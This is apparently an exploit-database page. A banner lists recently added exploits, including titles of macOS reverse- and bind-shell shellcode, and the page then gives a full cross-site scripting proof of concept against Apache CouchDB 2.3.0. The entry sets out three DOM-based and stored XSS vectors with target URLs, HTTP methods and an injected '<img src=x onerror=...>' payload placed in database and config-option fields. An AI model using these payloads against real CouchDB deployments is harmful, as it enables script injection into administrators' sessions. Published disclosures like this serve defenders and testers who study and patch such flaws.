
25 changes to exploits/shellcodes Realterm Serial Terminal 2.0.0.70 - Denial of Service Realterm Serial Terminal 2.0.0.70 - Local Buffer Overflow (SEH) NBMonitor 1.6.5.0 - 'Key' Denial of Service (PoC) Oracle Java Runtime Environment - Heap Out-of-Bounds Read During OTF Font Rendering in glyph_CloseContour Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers qdPM 9.1 - 'type' Cross-Site Scripting qdPM 9.1 - 'search[keywords]' Cross-Site Scripting Master IP CAM 01 3.3.4.2103 - Remote Command Execution MISP 2.4.97 - SQL Command Execution via Command Injection in STIX Module CMSsite 1.0 - 'post' SQL Injection M/Monit 3.7.2 - Privilege Escalation Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload Apache CouchDB 2.3.0 - Cross-Site Scripting ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting Comodo Dome Firewall 2.7.0 - Cross-Site Scripting Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload WordPress Plugin WooCommerce - GloBee (cryptocurrency) Payment Gateway 1.1.1 - Payment Bypass / Unauthorized Order Status Spoofing macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes) macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes) macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes) macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)
64 lines
No EOL
2 KiB
Text
64 lines
No EOL
2 KiB
Text
##################################################################################################################################
|
|
# Exploit Title: Apache CouchDB 2.3.0 | Cross-Site Scripting
|
|
# Date: 17.02.2019
|
|
# Exploit Author: Ozer Goker
|
|
# Vendor Homepage: http://couchdb.apache.org
|
|
# Software Link: http://couchdb.apache.org/#download
|
|
# Version: 2.3.0
|
|
##################################################################################################################################
|
|
|
|
Introduction
|
|
|
|
A CouchDB server hosts named databases, which store documents. Each
|
|
document is uniquely named in the database, and CouchDB provides a RESTful
|
|
HTTP API for reading and updating (add, edit, delete) database documents.
|
|
|
|
#################################################################################
|
|
|
|
XSS details: DOM Based & Reflected & Stored
|
|
|
|
#################################################################################
|
|
|
|
XSS1 | DOM Based - Create Database
|
|
|
|
URL
|
|
http://127.0.0.1:5984/_utils/#/_all_dbs
|
|
|
|
|
|
PAYLOAD
|
|
<img src=x onerror=alert(1)>
|
|
|
|
<input id="js-new-database-name" type="text" class="input-xxlarge"
|
|
placeholder="Name of database" value="<img src=x onerror=alert(1)>">
|
|
|
|
#################################################################################
|
|
|
|
XSS2 | DOM Based & Stored - Add Option
|
|
|
|
URL
|
|
http://127.0.0.1:5984/_utils/#_config/couchdb@localhost
|
|
http://127.0.0.1:5984/_node/couchdb@localhost/_config/1/%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E
|
|
|
|
METHOD
|
|
Put
|
|
|
|
PAYLOAD
|
|
<img src=x onerror=alert(2)>
|
|
|
|
<input class="input-option-name" type="text" name="name" placeholder="Name">
|
|
|
|
#################################################################################
|
|
|
|
XSS3 | DOM Based & Stored - Delete Option
|
|
|
|
URL
|
|
http://127.0.0.1:5984/_utils/#_config/couchdb@localhost
|
|
http://127.0.0.1:5984/_node/couchdb@localhost/_config/1/%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E
|
|
|
|
METHOD
|
|
Delete
|
|
|
|
PAYLOAD
|
|
<img src=x onerror=alert(2)>
|
|
|
|
################################################################################# |